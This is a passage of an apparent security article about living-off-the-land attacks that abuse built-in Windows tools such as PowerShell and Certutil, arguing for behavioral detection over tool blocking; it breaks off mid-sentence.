What 45 Days of Watching Your Own Tools Will Tell You About Your Real Attack Surface

Living-off-the-land attacks exploit legitimate system administration tools that most security teams overlook because they trust them. Threat actors increasingly use built-in Windows utilities like PowerShell, WMIC, netsh, Certutil, and MSBuild to move laterally, establish persistence, and exfiltrate data without triggering traditional malware defenses.

Bitdefender's research demonstrates that monitoring these trusted tools over 45 days reveals the true attack surface within organizations. The analysis shows that legitimate administrative activity and malicious activity often look identical to conventional detection systems. This creates a fundamental blind spot: security teams struggle to distinguish between an IT administrator running PowerShell scripts and an attacker using the same tool to harvest credentials or deploy backdoors.

The threat model has shifted. Modern adversaries avoid deploying obvious malware payloads because endpoint protection catches them quickly. Instead, they abuse the trust placed in native Windows utilities. PowerShell alone offers command-line access, script execution, and network communication capabilities that rival dedicated penetration testing frameworks. Certutil handles certificate operations but also downloads and encodes files. MSBuild compiles projects but also executes arbitrary code. These tools carry legitimate purposes, making rule-based blocking problematic and signature-based detection ineffective.

Organizations face a practical challenge: elevated privileges required for legitimate administration become the same privileges attackers need for lateral movement. The 45-day observation window reveals that attack surface visibility requires behavioral analysis rather than tool blacklisting. Monitoring execution context, parent processes, command-line arguments, and network connections separates suspicious PowerShell activity from routine patch management.

Detection strategies must shift toward anomaly-based approaches. Baselining normal administrative behavior across teams and departments allows security operations centers to flag deviations. A developer running Certutil during off-hours warrants investigation. An IT administrator running unusual MSBuild commands